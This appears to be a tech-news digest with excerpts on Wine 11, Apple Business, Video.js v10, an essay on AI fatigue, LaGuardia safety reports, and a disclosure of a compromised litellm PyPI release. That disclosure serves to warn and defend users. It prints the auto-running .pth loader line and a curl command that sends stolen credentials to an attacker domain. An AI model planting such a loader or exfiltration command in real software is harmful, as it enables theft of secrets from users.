10 interesting stories served every morning and every evening.
Linux gaming has come a long way. When Valve launched Proton back in 2018, it felt like a turning point, turning the Linux gaming experience from “technically possible if you’re okay with a lot of pain” to something that more or less worked. Since then, we’ve seen incremental Wine releases, each one chipping away at compatibility issues and improving performance bit by bit. Wine 10, Wine 9, and so on; each one a collection of bug fixes and small improvements that kept the ecosystem moving forward.
Wine 11 is different. This isn’t just another yearly release with a few hundred bug fixes and some compatibility tweaks. It represents a huge number of changes and bug fixes. However, it also ships with NTSYNC support, which is a feature that has been years in the making and rewrites how Wine handles one of the most performance-sensitive operations in modern gaming. On top of that, the WoW64 architecture overhaul is finally complete, the Wayland driver has grown up a lot, and there’s a big list of smaller improvements that collectively make this feel like an all-new project.
I should be clear: not every game is going to see a night-and-day difference. Some titles will run identically to before. But for the games that do benefit from these changes, the improvements range from noticeable to absurd. And because Proton, SteamOS, and every downstream project builds on top of Wine, those gains trickle down to everyone.
Everything up until now was a workaround
Esync and fsync worked, but they weren’t ideal
If you’ve spent any time tweaking Wine or Proton settings, you’ve probably encountered the terms “esync” and “fsync” before. Maybe you toggled them on in Lutris, or noticed them in Proton launch options, without fully understanding what they do. To understand why NTSYNC matters, you need to understand the problem these solutions were all trying to solve.
Windows games, especially modern ones, are heavily multi-threaded. Your CPU isn’t just running one thing at a time, and instead, it’s juggling rendering, physics calculations, asset streaming, audio processing, AI routines, and more, all in parallel across multiple threads. These threads need to coordinate with each other constantly. One thread might need to wait for another to finish loading a texture before it can render a frame. Another might need exclusive access to a shared resource so two threads don’t try to modify it simultaneously.
Windows handles this coordination through what are called NT synchronization primitives… mutexes, semaphores, events, and the like. They’re baked deep into the Windows kernel, and games rely on them heavily. The problem is that Linux doesn’t have native equivalents that behave exactly the same way. Wine has historically had to emulate these synchronization mechanisms, and the way it did so was, to put it simply, not ideal.
The original approach involved making a round-trip RPC call to a dedicated “kernel” process called wineserver every single time a game needed to synchronize between threads. For a game making thousands of these calls per second, that overhead added up fast and served to be a bottleneck. And it was a bottleneck that manifested as subtle frame stutters, inconsistent frame pacing, and games that just felt a little bit off even when the raw FPS numbers looked fine.
Esync was the first attempt at a workaround. Developed by Elizabeth Figura at CodeWeavers, it used Linux’s eventfd system call to handle synchronization without bouncing through the wineserver. It worked, and it helped, but it had quirks. Some distros ran into issues with file descriptor limits, since every synchronization object needed its own file descriptor, and games that opened a lot of them could hit the system’s ceiling quite quickly.
Fsync came next, using Linux futexes for even better performance. It was faster than esync in most cases, but it required out-of-tree kernel patches that never made it into the mainline Linux kernel or to upstream Wine out of the box. That meant you needed a custom or patched kernel to use it, which is fine for enthusiasts running CachyOS or Proton-GE, but not exactly accessible for the average user on Ubuntu or Fedora. Futex2, often referred to interchangeably with fsync, did make it to Linux kernel 5.16 as futex_waitv, but the original implementation of fsync isn’t that. Fsync used futex_wait_multiple, and Futex2 used futex_waitv. Applications such as Lutris still refer to it as Fsync, though. It’s still kind of fsync, but it’s not the original fsync.
Here’s the thing about both esync and fsync: they were workarounds. Clever ones, but workarounds nonetheless. They approximated NT synchronization behavior using Linux primitives that weren’t designed for the job, and certain edge cases simply couldn’t be handled correctly. Operations like NtPulseEvent() and the “wait-for-all” mode in NtWaitForMultipleObjects() require direct control over the underlying wait queues in ways that user-space implementations just can’t reliably provide.
Synchronization at the kernel-level, rather than in user-space
NTSYNC takes a completely different approach. Instead of trying to shoehorn Windows synchronization behavior into existing Linux primitives, it adds a new kernel driver that directly models the Windows NT synchronization object API. It exposes a /dev/ntsync device that Wine can talk to, and the kernel itself handles the coordination. No more round trips to wineserver, no more approximations, and the synchronization happens in the kernel, which is where it should be. And it has proper queue management, proper event semantics, and proper atomic operations.
What makes this even better is that NTSYNC was developed by the same person who created esync and fsync in the first place. Elizabeth Figura has been working on this problem for years, iterating through multiple kernel patch revisions, presenting the work at the Linux Plumbers Conference in 2023, and pushing through multiple versions of the patch set before it was finally merged into the mainline Linux kernel with version 6.14.
The numbers are wild. In developer benchmarks, Dirt 3 went from 110.6 FPS to 860.7 FPS, which is an impressive 678% improvement. Resident Evil 2 jumped from 26 FPS to 77 FPS. Call of Juarez went from 99.8 FPS to 224.1 FPS. Tiny Tina’s Wonderlands saw gains from 130 FPS to 360 FPS. As well, Call of Duty: Black Ops I is now actually playable on Linux, too. Those benchmarks compare Wine NTSYNC against upstream vanilla Wine, which means there’s no fsync or esync either. Gamers who use fsync are not going to see such a leap in performance in most games.
The games that benefit most from NTSYNC are the ones that were struggling before, such as titles with heavy multi-threaded workloads where the synchronization overhead was a genuine bottleneck. For those games, the difference is night and day. And unlike fsync, NTSYNC is in the mainline kernel, meaning you don’t need any custom patches or out-of-tree modules for it work. Any distro shipping kernel 6.14 or later, which at this point includes Fedora 42, Ubuntu 25.04, and more recent releases, will support it. Valve has already added the NTSYNC kernel driver to SteamOS 3.7.20 beta, loading the module by default, and an unofficial Proton fork, Proton GE, already has it enabled. When Valve’s official Proton rebases on Wine 11, every Steam Deck owner gets this for free.
All of this is what makes NTSYNC such a big deal, as it’s not simply a run-of-the-mill performance patch. Instead, it’s something much bigger: this is the first time Wine’s synchronization has been correct at the kernel level, implemented in the mainline Linux kernel, and available to everyone without jumping through hoops.
If NTSYNC is the headline feature, the completion of Wine’s WoW64 architecture is the change that will quietly improve everyone’s life going forward. On Windows, WoW64 (Windows 32-bit on Windows 64-bit) is the subsystem that lets 32-bit applications run on 64-bit systems. Wine has been working toward its own implementation of this for years, and Wine 11 marks the point where it’s officially done.
What this means in practice is that you no longer need 32-bit system libraries installed on your 64-bit Linux system to run 32-bit Windows applications. Wine handles the translation internally, using a single unified binary that automatically detects whether it’s dealing with a 32-bit or 64-bit executable. The old days of installing multilib packages, configuring ia32-libs, or fighting with 32-bit dependencies on your 64-bit distro thankfully over.
This might sound like a small quality-of-life improvement, but it’s a massive piece of engineering work. The WoW64 mode now handles OpenGL memory mappings, SCSI pass-through, and even 16-bit application support. Yes, 16-bit! If you’ve got ancient Windows software from the ’90s that you need to run for whatever reason, Wine 11 has you covered.
For gaming specifically, this matters because a surprising number of games, especially older ones, are 32-bit executables. Previously, getting these to work often meant wrestling with your distro’s multilib setup, which varied in quality and ease depending on whether you were on Ubuntu, Arch, Fedora, or something else entirely. Now, Wine just handles it for you.
The rest of Wine 11 isn’t just filler
There are more fixes, too
It’s easy to let NTSYNC and WoW64 steal the spotlight, but Wine 11 is packed to the gills with other stuff worth talking about.
The Wayland driver has come a long way. Clipboard support now works bidirectionally between Wine and native Wayland applications, which is one of those things you don’t think about until it doesn’t work and it drives you mad. Drag-and-drop from Wayland apps into Wine windows is supported. Display mode changes are now emulated through compositor scaling, which means older games that try to switch to lower resolutions like 640x480 actually behave properly instead of leaving you with a broken desktop. If you’ve been holding off on switching from X11 to Wayland because of Wine compatibility concerns, Wine 11 removes a lot of those barriers.
On the graphics front, EGL is now the default backend for OpenGL rendering on X11, replacing the older GLX path. Vulkan support has been bumped to API version 1.4, and there’s initial support for hardware-accelerated H.264 decoding through Direct3D 11 video APIs using Vulkan Video. That last one is particularly interesting for games and applications that use video playback for things like cutscenes or in-game streaming.
Force feedback support has been improved for racing wheels and flight sticks, which is great news if you’re running a sim setup on Linux. As well, Bluetooth has received a new driver with BLE services and proper pairing support, MIDI soundfont handling has been improved for legacy game music, and there are a couple of minor extras like Zip64 compression support, Unicode 17.0.0 support, TWAIN 2.0 scanning for 64-bit apps, and IPv6 ping functionality.
Thread priority management has been improved on both Linux and macOS, which helps with multi-threaded application performance beyond just the NTSYNC gains. ARM64 devices can now simulate 4K page sizes on systems with larger native pages, which keeps the door open for Wine on Arm hardware. And with more Arm-based Linux devices showing up every year, that matters more than it used to.
Plus, there are a ton of bug fixes. Games like Nioh 2, StarCraft 2, The Witcher 2, Call of Duty: Black Ops II, Final Fantasy XI, and Battle.net all received specific compatibility fixes, which is additional to the broader improvements made across the board that will improve performance and compatibility across significantly more titles.
Wine 11 is a big release, and it’s not just NTSYNC that makes it the case. Sure, NTSYNC alone would have made it worth paying attention to, but combined with the WoW64 completion, the Wayland improvements, and the sheer volume of fixes, it’s the most important Wine release since Proton made Linux gaming viable. Everything built on top of Wine, from Proton to Lutris to Bottles, gets better because of it. If you play games on Linux at all, Wine 11 is worth your time trying out.
...
Read the original on www.xda-developers.com »
The litellm==1.82.8 wheel package on PyPI contains a malicious .pth file (litellm_init.pth, 34,628 bytes) that automatically executes a credential-stealing script every time the Python interpreter starts — no import litellm required.
This is a supply chain compromise. The malicious file is listed in the package’s own RECORD:
pip download litellm==1.82.8 –no-deps -d /tmp/check
python3 -c ”
import zipfile, os
whl = ‘/tmp/check/’ + [f for f in os.listdir(‘/tmp/check’) if f.endswith(‘.whl’)][0]
with zipfile.ZipFile(whl) as z:
pth = [n for n in z.namelist() if n.endswith(‘.pth’)]
print(‘PTH files:’, pth)
for p in pth:
print(z.read(p)[:300])
You will see litellm_init.pth containing:
import os, subprocess, sys; subprocess.Popen([sys.executable, “-c”, “import base64; exec(base64.b64decode(‘…’))“])
The payload is double base64-encoded. When decoded, it performs the following:
The script collects sensitive data from the host system:
* Webhook URLs: grep for Slack/Discord webhook URLs in env and config files
The collected data is encrypted with openssl enc -aes-256-cbc -pbkdf2
The AES session key is encrypted with a hardcoded 4096-bit RSA public key via openssl pkeyutl -encrypt -pkeyopt rsa_padding_mode:oaep
Both encrypted files are packed into tpcp.tar.gz
The archive is exfiltrated via:
curl -s -o /dev/null -X POST \
“https://models.litellm.cloud/” \
-H “Content-Type: application/octet-stream” \
-H “X-Filename: tpcp.tar.gz” \
–data-binary @tpcp.tar.gz
* Trigger mechanism: .pth files in site-packages/ are executed automatically by the Python interpreter on startup (see Python docs on .pth files). No import statement is needed.
* Stealth: The payload is double base64-encoded, making it invisible to naive source code grep.
* Exfiltration target: https://models.litellm.cloud/ — note the domain litellm.cloud (NOT litellm.ai, the official domain).
Anyone who installed litellm==1.82.8 via pip has had all environment variables, SSH keys, cloud credentials, and other secrets collected and sent to an attacker-controlled server.
* Other versions: Not yet checked — the attacker may have compromised multiple releases
Users: Check for litellm_init.pth in your site-packages/ directory
Users: Rotate ALL credentials that were present as environment variables or in config files on any system where litellm 1.82.8 was installed
...
Read the original on github.com »
At serious risk of sounding like a heretic here, but I’m kinda bored of talking about AI.
I get it, AI is incredible. I use it every day, it’s completely changed my workflow. I recently started a new role in a tricky domain working at web scale (hey, remember web scale?) and it’s allowed me to go from 0-1 in terms of productivity in a matter of weeks.
With that being said, it’s all starting to feel a bit… routine. I’m not here to argue that the pace of change has been incredible, but on a day-to-day basis I’ve sorta ran out of things to talk about. What makes this worse is it’s completely taken over mindshare across my section of the internet.
Hacker News, my favourite haunt, used to be full of interesting projects and problems being solved but this seems to have devolved into three different people’s (almost identical) Claude code workflow and yet another post about how you got OpenClaw to stroke your cat and play video games so you had way more time to… configure AI tooling. This all feels a little self-fulfilling.
Kagi small web
is another great example of this effect. Here’s a challenge, open it up and press the ‘next’ button 20 times. What percentage of posts are AI related?
Before you write me off as ‘old man yells at cloud’, understand where I’m coming from. In the good old days (2023), before we called anybody who could open a Claude code terminal an ‘AI engineer’, being a ‘Product Engineer’ was the hot new term. The idea was that engineers should move away from obsessing over code to obsessing over the product value they were delivering. I loved this, it made loads of sense to me, but we seem to have regressed. It’s no longer the code we’re obsessing over, it’s the overgrown auto-complete we’ve developed to make the easiest part of being an engineer easier.
It’s like if I went onto the woodworking subreddit and they’d all stopped showing pictures of the tables they’d created and just started posting about the hammer they were using. But they were all using basically the same hammer in the same way, so they were just screaming the same shit at each other at the top of their voices.
What makes this worse, is our bosses have bought into it this time too. My managers never cared much about database technologies, IDE’s or javascript frameworks; they just wanted the feature so they could sell it. Management seems to have stepped firmly and somewhat haphazardly into the implementation detail now. I reckon most of us have got some sort of company initiative to ‘use more AI’ in our objectives this year. Management’s involvement in the SDLC has always been a thing, DORA metrics have been around for a while. But historically, it’s always been about the outputs. Faster deploys, time to respond. Now we’re measuring the number of tokens used per-dev, which is no more useful than lines of code ever was.
I guess what I’m saying, other than just having a general whinge, is tell me more about the cool shit you’re building rather than the tools you’re using to build it. And don’t forget that the whole purpose of coding, like any other craft, is to create something that delivers value for someone. Even if that someone is just yourself.
… And yes, I’m painfully aware of the irony of a post about moaning about posts about AI. Sorry.
...
Read the original on blog.jakesaunders.dev »
Introducing Apple Business — a new all‑in‑one platform for businesses of all sizes
Apple Business combines built-in mobile device management, business email and calendar services with custom domain support, and a powerful new option to reach local customers
Apple today announced Apple Business, a new all-in-one platform that includes key services companies need to effortlessly manage devices, reach more customers, equip team members with essential apps and tools, and get support from experts to run and grow efficiently and securely. Apple Business features built-in mobile device management, helping businesses easily configure employee groups, device settings, security, and apps with Blueprints to quickly get started. In addition, customers can now set up business email, calendar, and directory services with their own domain name for seamless and elevated communication and collaboration. And Apple Business can help millions of companies grow their reach and connect with local customers across Apple Maps, Mail, Wallet, Siri, and more, including a new option coming this summer that will enable businesses in the U. S. and Canada to place local ads in Maps during key search and discovery moments. Apple Business will be available starting Tuesday, April 14, in more than 200 countries and regions.1
“Apple Business is a significant leap forward in our decades-long commitment to helping companies of all sizes leverage the power of Apple products and services to run and grow,” said Susan Prescott, Apple’s vice president of Enterprise and Education Marketing. “We’ve unified Apple’s strongest business offerings into one simple, secure platform, delivering key features for organizations in every stage and sector, including built-in device management, collaboration tools, and additional ways to reach new customers. We can’t wait to see how Apple Business helps companies spend more time focusing on what they love and connecting deeply with their communities.”
Apple Business offers built-in mobile device management (MDM), facilitating a comprehensive view of an organization’s Apple devices, settings, and more from a single interface. Previously available as a subscription within Apple Business Essentials in the U. S., Apple Business is designed to make IT easy — including for small businesses without dedicated IT resources. Apple Business includes new Blueprints to easily set up devices with preconfigured settings and apps, ensuring consistency and security and enabling zero-touch deployment for employees, so that new Apple products are ready to go out of the box.2
Apple Business includes options to purchase upgraded iCloud storage and support with AppleCare+ for Business, and a companion Apple Business app will allow employees to install apps for work, view colleague contact information, and request support while on the go.3
Apple Business expands the availability of Apple Business Manager to more than 200 countries and regions, and supports additional device management features, including:
* Managed Apple Accounts: Company data remains secure while employee data remains private, with cryptographic separation of work and personal data on devices. Apple Business enables automated Managed Apple Account creation for new employees through integration with an identity service provider, including Google Workspace, Microsoft Entra ID, and more.
* Employee management: Create user groups by function or team to assign apps and roles. Organizations can also create custom roles to manage access exactly the way they want.
* App distribution: Easily acquire and distribute apps to employees and teams through the App Store.
* Admin API: Simplify large deployments with API access to device, user, audit, and MDM service data.
New Ways to Manage Productivity and Collaboration
Apple Business introduces fully integrated email, calendar, and directory services that are designed to make it seamless to start a new business with a professional identity. Businesses can bring their own custom domain name or purchase a new one through Apple Business, helping founders elevate communication and collaboration. These services streamline operations, with scheduling tools like calendar delegation and a built-in company directory to make it easy for employees to connect with user groups and personalized contact cards.
Every day, users choose Apple Maps to discover and explore places and businesses around them. Beginning this summer in the U. S. and Canada, businesses will have a new way to be discovered by using Apple Business to create ads on Maps. Ads on Maps will appear when users search in Maps, and can appear at the top of a user’s search results based on relevance, as well as at the top of a new Suggested Places experience in Maps, which will display recommendations based on what’s trending nearby, the user’s recent searches, and more. Ads will be clearly marked to ensure transparency for Maps users.
Ads on Maps builds on Apple’s broader privacy-first approach to advertising, and maintains the same privacy protections Maps users enjoy today. A user’s location and the ads they see and interact with in Maps are not associated with a user’s Apple Account. Personal data stays on a user’s device, is not collected or stored by Apple, and is not shared with third parties. When Apple Business is available in April, businesses will need to first claim their location on Maps. Once ads on Maps is available, businesses will be able to access a fully automated experience of creating ads through Apple Business in a few simple steps. Current Apple Ads advertisers and agencies will also have the option to book ads through their existing Apple Ads experience, which will offer additional customization options for their ad campaigns.
Brand and Location Features in One Convenient Place
Brand management tools previously available in Apple Business Connect will now be available through Apple Business, making it easier than ever for businesses to set up and manage how their brand and locations appear across Apple services and apps.
* Brand profiles: Manage brand name, logo, and key details consistently across Apple Maps, Wallet, and other features and apps.
* Rich place cards: Customize with photos, detailed location information, hours, and other useful details that display across Apple Maps, Safari, Spotlight, and more.
* Showcases and custom actions: Highlight deals, special offers, new products, or seasonal items on place cards in Maps. Add custom actions like order or reserve to direct customers to a preferred website or app.
* Location insights: Gain valuable insights into how customers discover and interact with businesses on Maps, including search, views, and taps on actions.
* Branded communications: Display branding prominently in the Mail app and on iCloud Mail to increase awareness. Branding will display with tracked orders in Wallet for a more recognizable customer experience.
* Tap to Pay on iPhone: Build trust by displaying a brand logo and name on the payment screen when accepting payments directly on iPhone.
* Starting April 14, Apple Business will be available as a free service in the U.S. and 200+ countries and regions to new and existing users of Apple Business Connect, Apple Business Essentials, and Apple Business Manager. For more information, visit business.apple.com/preview.
* Ads on Apple Maps will be available to businesses starting this summer in the U.S. and Canada. For more information, visit ads.apple.com/maps.
* Apple Business Essentials, Apple Business Manager, and Apple Business Connect will no longer be available once Apple Business launches. Business Essentials customers will no longer be charged their monthly service fee for device management after April 14. Existing Business Connect data — including claimed locations, place card information, photos, organization information, account details, and more — will automatically migrate to Apple Business at launch.
* The Apple Business companion app, along with email, calendar, and directory features, will require iOS 26, iPadOS 26, or macOS 26.
* Customers in the U.S. can purchase additional iCloud storage up to 2TB per user, starting at $0.99 per user per month. AppleCare+ for Business coverage is available per device or per user, starting at $6.99 per month, or $13.99 per month per user for up to three devices.
Apple Business is available globally; certain features may be available in select countries and regions. See business.apple.com/preview for more details.
Zero-touch deployment is available when devices are purchased through Apple or Apple Authorized Resellers.
Additional iCloud storage and AppleCare+ for Business are available as additional paid offerings.
...
Read the original on www.apple.com »
“We are surveilling markets and our approach to market abuse will be to look at the evidence in front of us. I can’t speak for what our US colleagues are doing,” he said.
...
Read the original on www.bbc.com »
Today we’re excited to release the Video.js v10.0.0 beta. It’s the result of a rather large ground-up rewrite, not just of Video.js (discussion) but also of Plyr, Vidstack, and Media Chrome, through a rare teaming-up of open source projects and people who care a lot about web video, with a combined 75,000 github stars and tens of billions of video plays monthly.
I built Video.js 16 years ago to help the transition from Flash to HTML5 video. It’s grown a lot since then with the help of many people, but the codebase and APIs have continued to reflect a different era of web development. This rebuild modernizes the player both for how developers build today and sets up the foundation for the next significant transition to AI-augmented features and development.
* Shrinking bundle sizes, and then shrinking them more (88% reduction in default bundle size)
* Allowing deep customization using the familiar development patterns of your chosen framework — including new first-class React, Typescript, and Tailwind support
* Making the defaults look beautiful and perform beautifully (The experts are calling me saying “Sir, how did you make it so great?”. It’s incredible, really.)
* Designing the codebase and docs so AI agents building your player alongside you can actually be good at it
We’re pretty sure it works differently from what you’ve come to expect of a web media player, while we hope it feels more familiar to how you actually build.
One of the biggest complaints about video players today is their file size, often weighing in around 1MB minified and hundreds of KB gzipped. Players are sneakily-complex applications so there’s only so many bytes you can shave off, but legacy players were built in times before smart bundlers, tree shaking, and other size-saving opportunities. They carry with them many features you may not be actively using.
The Video.js v10 default player is now 88% smaller than the size of the previous version’s (v8.x.x) default. A good chunk of those savings come from the decision to unbundle adaptive bitrate (ABR) support, which you could remove in the previous version by instead importing from video.js/core , but the majority of video.js installs just use the default bundle while also not using the adaptive streaming features. Comparing more similar apples, with ABR removed, the v10 default video player (HTML) is still 66% smaller than the size of the previous version, getting even smaller from there depending on which bundle you need.
While the previous section was comparing players without ABR, a lot of the weight of a fully-featured video player comes from the streaming engine which is needed to handle adaptive bitrate (ABR) formats like HLS and DASH — for manifest parsing, segment loading, buffer management, ABR logic, codec detection, MSE integration, DRM, server-side ads, and more. Similar to players, traditional streaming engines have monolithic architectures making it difficult to get the bundle size smaller.
As part of v10 we’ve started a new engine project called SPF 😎 (Streaming Processor Framework), which is a framework built around functional components that are composed into purpose-built, smaller streaming engines. For example if you have a short-form video app with simple adaptive streaming needs, your engine won’t ship with any code for DRM and ads.
For a simple HLS use case, Video.js v10 using SPF is only 19% the file size of Video.js v8 including adaptive bitrate streaming (ABR).
Comparing engines to engines you get a clearer picture of the story. The other engines are very difficult to get any smaller without forking them, while the engine composed using SPF only includes what’s needed for simple adaptive streaming using HLS, making it only 12% the file size of even HLS.js-light .
To be clear, the immediate goal isn’t for SPF to replace the full-featured engines like HLS.js for advanced streaming use cases, and in fact v10 works with all these streaming engines today. The goal is to achieve much smaller file sizes for common, simpler use cases. At the same time we think a lot more sites and apps could benefit from simple ABR, and we want SPF to lower the file size cost of using it.
With v10 the file size story doesn’t actually start with the baseline builds. The library is built for composing a player with only what’s needed, allowing for simple use cases to be even smaller.
For example here’s a simple React “hello world” with just a video and play button, weighing in at gzipped .
You could for sure build that example with an even smaller file size, but it’s meant to show that the the player infrastructure is minimal, while supporting much more advanced and custom players.
In v10 we first split State, UI, and Media into their own components that work together through API contracts instead of monolithic controllers and overloaded player objects. Each major component is optional and easily swappable or configurable. UI and Media components can also be used just by themselves.
The createPlayer function takes an array of features (like Zustand store slices) to build up its internal state capabilities. If your player doesn’t need audio it doesn’t have to bundle the code for volume and mute. In legacy players this wasn’t possible without forking the code.
Don’t need UI or want to build your own? Just delete the skin, it’s right there in your code. In legacy players, setting controls=false still results in a bundle with all the controls. With v10 if you don’t import a component, it doesn’t exist in your bundle.
File size is far from the only important performance metric when it comes to video players, but it’s one that can get away from you quickly if you don’t architect for it upfront. There’s still improvements we can make but we’re really happy with the results of the new architecture so far.
Video.js v10 beta comes with a few polished, complete skins (control sets) you can use out of the box. But we hope you don’t stop there because we’ve put a lot of effort into making the UI components themselves great to work with in any framework. We’ve started with React and Web Components, but hope to move quickly into supporting other popular JS frameworks directly.
When you’re ready to go deeper, you can eject any skin and get the full source code in your framework’s language — real components you own and modify, inspired by shadcn/ui. For Beta “eject” just means copy/paste from the docs, but a fancier CLI option is on the way.
v10’s UI is built with unstyled UI primitives, inspired by libs like Base UI and Radix, which means they get out of your way when you’re trying to do anything custom. Each component outputs a single HTML element, so you have direct access to everything happening in the UI.
They’re more verbose, and as a long time HTML-er I’ll admit I was not a fan at first glance. But after building a player skin with them I understood why this is the way . For example, in the previous version (v8) the timeline thumb/handle was a pseudo-element on a nested child. You overrode it through inspecting the player’s output, using specificity and a font-size for dimensions.
In v10, it’s a real element with a class you control.
The previous version’s default skin is used billions of times every month, and yet we put relatively little design effort into it. At the time I hoped devs would style it and make it their own, and then they didn’t.
For v10, Sam Potts (creator of Plyr, 29,000 GitHub stars largely on the strength of its design) designed the new skins, and will continue to invest in them and iterations over time. The beta ships two skins: a default skin with a frosted aesthetic and a minimal skin for developers who want a clean starting point, both with refined controls, smooth interactions, and thoughtful animations
One detail I love is the error dialog, where the visual treatment matches the skin. I’m sure that feels tiny and simple, but in Video.js history this level of detail was so far down the priority list that for a decade the error dialog has been my big ugly text ‘X’, for every skin. So when I see these new error dialogs it helps confirm we’re all setting the bar higher, and I’m loving it.
Amazon.com featuring the version 8 error dialog “X” (I forced the error for the screenshot)
While these beta skins are a great starting point, they’re just the beginning.
If you wanted to build a podcast player with Video.js v8, you’d start with a video player, strip out the video-specific parts, add some specific audio features, and then spend real time on UI customization to get something that actually looked and felt like a podcast player. Same story for a background video on a landing page, or a short-form swipeable player, or a classroom course player.
We do actually know what people are building, believe it or not. Not just the individual features, but the specific combinations that tend to show up together. A TV streaming app needs different things than a hero background video, which needs different things than a podcast player. And those combinations are pretty consistent across the web.
So in v10 we’re packaging them up as presets. A preset is a purpose-built combination of skin, features, and media configuration for a specific use case. Instead of assembling a player from scratch, you’ll pick the preset closest to what you’re building and start there.
A default video preset (general website video, the kind of thing you might otherwise use the HTML video tag for)
A default audio preset (same idea but for the audio tag)
And a background video preset. Background video is where this concept really starts to click, because a background video needs layout but doesn’t need controls and doesn’t need audio. Rather than handing you a full player and asking you to remove things, we just give you the right player for the job.
This is also where the compositional architecture pays off. The preset gets you started fast. The composable foundation underneath means you can still add, remove, or replace anything. You get a real starting point without giving up any of the flexibility.
Over time we’ll expand into more use cases: creator-platform players, short-form swipeable video, educational course players. If there’s a use case you’d love to see, let us know.
The last year, and even just the last few months specifically have been a wild time to be building a new project like this. We’re of course excited for how AI will create interesting interactive player features in the months and years to come and we have a few ideas of what those will be. For Beta, however, we’ve been focused on the agent experience of building video.js-based players with the help of AI.
* Less-abstracted components and unstyled UI primitives so agents can do more with the code right in your project and need fewer external docs
* Markdown versions of every individual doc. If your agent hits our site with the accept: text/markdown header — as many like Claude Code do — we’ll send the markdown version of the page, saving your agent loads of unnecessary context bloat.
* A growing set of AI skills in the repo, currently helping us build and soon will help you build too.
In writing this part and getting input from the team I found we actually have a lot to say about our experience building with AI and the many ways we put it to use, so keep an eye out for a followup post on that topic.
A few things to know:
* The APIs are not quite stable. This is a beta, so some interfaces will change before GA. Build with it, experiment, give us feedback, put it on simple projects. It’s not yet the time to do a major migration.
* The features may be limited. You might be surprised by which features aren’t supported yet and also by which already are. We are building from a base of four existing players, but our goal for reaching beta was simple website playback functionality. It’s accessible and supports captions, and already works with many formats and streaming services, but things like settings menus are still on their way.
* We really want your feedback. File issues on GitHub, join the conversation on discord, tell us what works and what doesn’t. In general, people seem to get less engaged with JS “widgets” like a video player compared to JS frameworks, so please don’t be shy. Your input is really valuable.
If you’re starting something new, this is a good time to try v10. Go to videojs.org and check out the installation guide.
If you’re running a previous version in production, sit tight. We’ll have migration guides before we ask you to move.
We’re aiming for mid-2026 for GA. Between now and then:
* Feature parity with the capabilities developers rely on in the previous version of Plyr, Vidstack and Media Chrome.
Planning ads support later in 2026. Ads are complicated.
* Planning ads support later in 2026. Ads are complicated.
* More player presets for common use cases
@cpilsbury, @decepulis, @esbie, @luwes, @mihar-22, @sampotts for building the thing — who needs AI when you have the absolute best team of people in the world. I’m aware that makes no sense.
That said, @claude. I don’t know if you can hear this yet, but we certainly burned through some tokens together.
@dhassoun, @essk, @ewelch-mux, @gesinger, @gkatsev, @kixelated, @littlespex, @mister-ben, @misteroneill for being the best advisors and internal champions a project could hope for.
My company @muxinc for stepping in to make sure Video.js still has breath and allowing many of us to spend all our time on it. And @brightcove for keeping it breathing for so many years before. Our friends at @qualabs for carrying the load of other projects and giving us time to focus.
I’m very excited for you to fall back in love with your video player ❤️ (This is a theme we’re doing. We have cool stickers.)
...
Read the original on videojs.org »
...
Read the original on www.answer.ai »
Pilot safety concerns about New York’s LaGuardia airport were filed to aviation officials months before Sunday’s collision between an airplane and a fire truck left two pilots dead and 41 other people hospitalized.
According to the aviation safety reporting system administered by the US space agency Nasa, a pilot using the airport in the summer wrote, “Please do something,” after air traffic controllers failed to provide appropriate guidance about multiple nearby aircraft.
“The pace of operations is building in LGA,” they wrote, referring to the New York City airport, one of the busiest in the US. “The controllers are pushing the line.”
In a reference to the January 2025 mid-air collision over the Potomac River in Washington DC that killed more than 60 people, they said: “On thunderstorm days, LGA is starting to feel like [Ronald Reagan National airport] did before the accident there.”
The warning, first reported by CNN, showed that the pilot of the aircraft was concerned that LaGuardia’s control tower initiated a takeoff clearance for an aircraft when their plane was “only 300 feet high on final” approach on a different runway — and the departing plane had hesitated initiating its takeoff run.
“I think he or she thought twice before starting their takeoff roll,” the pilot of the aircraft said. The pilot mentioned how thick, smoky haze from wildfires in Canada at the time as well as a possible helicopter in the area had convinced him it was “safer to continue the approach and land [about] 10 seconds after the departing aircraft crossed our path”.
Otherwise, the pilot added, he would have been left “suddenly going around and trusting that the helicopter was not near the departure end of 22”, with the number referring to a runway.
The pilot concluded: “the [air traffic control] guidance … does not seem to give guidance on exactly how close aircraft in this situation can get.”
“Based on today’s and close calls I have seen over the years for [runways at the Philadelphia and Newark international airports], it seems to be a [judgment] call by the local controller.”
They also said that a runway lighting system had been turned off. In another report since January 2025, a pilot said their aircraft had been cleared to cross a runway — but crossing “we noticed an aircraft we thought was landing at [runway] 31C seemingly headed for us.”
Air traffic control “should have sent the aircraft around”, they said.
Nasa’s Aviation Safety Reporting System has received dozens of anonymous pilot complaints about safety concerns at the smallest of New York’s three local airports.
The reports come as investigators are looking into the collision of a landing Air Canada Express flight 646 from Montreal that collided with an airport firetruck that had been cleared to cross the runway, leading to the deaths of pilots MacKenzie Gunther and Antoine Forest as well as injuries to dozens more.
After the air traffic controller cleared the fire truck, which was responding to a plane that had reported difficulties, the controller then tried to stop it from crossing. He could later be heard saying on a recording that he had been “dealing with an emergency earlier” and that he “messed up”.
The crash has raised fears that operations at US airports are under extreme stress. Airports have been dealing with a shortage of air traffic controllers, exacerbated by brutal federal government personnel cuts by Donald Trump’s administration at the start of his second presidency.
Airports have also grappled with ageing equipment and a shortage of security screeners owing to a partial government shutdown since mid-February, which has caused long security lines and frustration among travelers. More than 450 TSA officers have quit during the partial government shutdown, Department of Homeland Security said on Tuesday.
“We did not need another aviation tragedy to see this coming,” said to aviation expert Brian Fielkow in a comment to the Guardian. An investigation into the collision will take take time, he warned, but “let’s stop pretending we don’t understand the conditions in which this is happening.
“We are watching a system under strain. TSA professionals are showing up to work without pay. This creates distraction, instability and unnecessary risk. We are asking people responsible for securing our transportation system to operate under financial and emotional strain and expecting flawless performance. We are managing aviation safety like a political pawn instead of a system that cannot fail.”
Federal investigators said late on Monday it was too soon to answer many questions about Sunday’s deadly accident but promised more information would be released Tuesday.
Jennifer Homendy, the National Transportation Safety Board (NTSB) chair whose agency is investigating Sunday’s crash, said investigators would analyze the involved airplane’s cockpit and flight data recorders, which were recovered from the wreck undamaged.
She said the runway where the crash happened was likely to be closed for days as investigators sift through a “tremendous amount of debris”.
Homendy also said that an NTSB investigator sent to LaGuardia on Monday was delayed for three hours by security lines in Houston.
“Our air traffic control specialist, who was in line … for three hours, until we called … to beg, to see if we can get her through, so we can get her here.
“So it’s been a really big challenge to get the entire team here, and they’re still arriving as we speak,” Homandy added.
The Trump administration has sent Immigration and Customs Enforcement (ICE) agents to many US airports, claiming they are there to help with long pre-security lines.
